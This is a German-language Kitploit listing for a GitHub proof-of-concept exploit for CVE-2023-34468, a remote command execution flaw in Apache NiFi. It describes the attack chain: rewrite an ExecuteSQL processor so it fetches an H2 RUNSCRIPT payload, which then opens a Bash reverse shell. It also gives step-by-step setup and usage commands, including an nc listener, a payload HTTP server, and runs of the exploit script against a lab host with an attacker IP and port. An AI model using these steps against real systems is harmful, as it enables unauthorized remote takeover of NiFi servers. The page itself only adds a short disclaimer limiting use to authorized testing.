Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-34468 — CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC | Kitploit
Tools/GitHubGitHub/ozcanpng/cve-2023-34468
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed TeamingPayload-Entwicklung
GitHubozcanpng/cve-2023-34468

CVE-2023-34468

CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC

Repository anzeigen
3vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-34468 — Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC

Kurzer Python-PoC zum Ausnutzen eines editierbaren Apache-NiFi-ExecuteSQL-Prozessors mit einem H2-RUNSCRIPT-Payload, um eine Remote-Befehlsausführung über eine Bash-Reverse-Shell auszulösen.

Nur für autorisierte Tests und Forschungszwecke. Verwenden Sie es nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Genehmigung zum Testen haben.


Was es tut

root@kitploit:~
ExecuteSQL processor update -> H2 RUNSCRIPT fetch -> Bash reverse shell -> processor restore
  1. Ermittelt automatisch einen einzelnen ExecuteSQL-Prozessor oder akzeptiert --processor-id manuell.
  2. Schreibt einen lokalen rce.sql-Payload, der einen Java-gestützten Shell-Ausführungs-Alias definiert und aufruft.
  3. Fordert Sie auf, einen eigenen nc-Listener und HTTP-Server zu starten.
  4. Aktualisiert die Prozessor-Abfrage, um rce.sql über H2 RUNSCRIPT abzurufen.
Tool herunterladen
  • Startet den Prozessor, um die Reverse-Shell auszulösen.
  • Stellt die ursprüngliche Prozessor-Konfiguration wieder her, nachdem Sie bestätigen, dass die Shell angekommen ist.

  • Screenshots

    1. Einrichtung

    Einrichtung

    2. Anfrage an den Payload

    Exploit-Ausführung

    3. Shell empfangen

    Prozessor-Update

    4. Ergebnis

    Ergebnis


    Einrichtung

    root@kitploit:~
    git clone https://github.com/ozcanpng/CVE-2023-34468.git
    cd CVE-2023-34468
    python3 -m venv .venv
    source .venv/bin/activate
    pip install -r requirements.txt
    

    Verwendung

    Terminal 1:

    root@kitploit:~
    rlwrap nc -lvnp 4444
    

    Terminal 2, aus diesem Repo-Verzeichnis:

    root@kitploit:~
    python3 -m http.server 8000
    

    Terminal 3:

    root@kitploit:~
    python3 CVE-2023-34468.py --url http://flow.helix.htb --lhost 10.10.16.53 --lport 4444
    

    Für die manuelle Prozessorauswahl:

    root@kitploit:~
    python3 CVE-2023-34468.py --url http://flow.helix.htb --processor-id <UUID> --lhost 10.10.16.53 --lport 4444
    

    Betroffen

    ProduktBetroffene VersionErforderlicher ZugriffAuswirkung
    Apache NiFiVon CVE-2023-34468 betroffene Bereitstellungen mit editierbarem ExecuteSQL/H2-VerhaltenFähigkeit, den Ziel-NiFi-Prozessor über die API zu erreichen und zu ändernRemote-Befehlsausführung

    Hinweise

    • Das Skript setzt voraus, dass die NiFi-API erreichbar ist und der aktuelle Benutzer/die aktuelle Sitzung den Zielprozessor ändern kann.
    • Die generierte Datei rce.sql wird von git ignoriert und sollte mit python3 -m http.server aus dem Repo-Verzeichnis bereitgestellt werden.
    • Wenn die automatische Erkennung keinen Prozessor oder mehrere Kandidaten findet, übergeben Sie die Prozessor-UUID manuell mit --processor-id.
    • Das Skript versucht, die ursprüngliche ExecuteSQL-Prozessor-Konfiguration wiederherzustellen, nachdem Sie bestätigen, dass die Shell angekommen ist.

    Referenzen

    • NVD — CVE-2023-34468
    • Apache NiFi
    • H2-Datenbankbefehle

    Autor

    ozcanpng — github.com/ozcanpng — ozcanpng.dev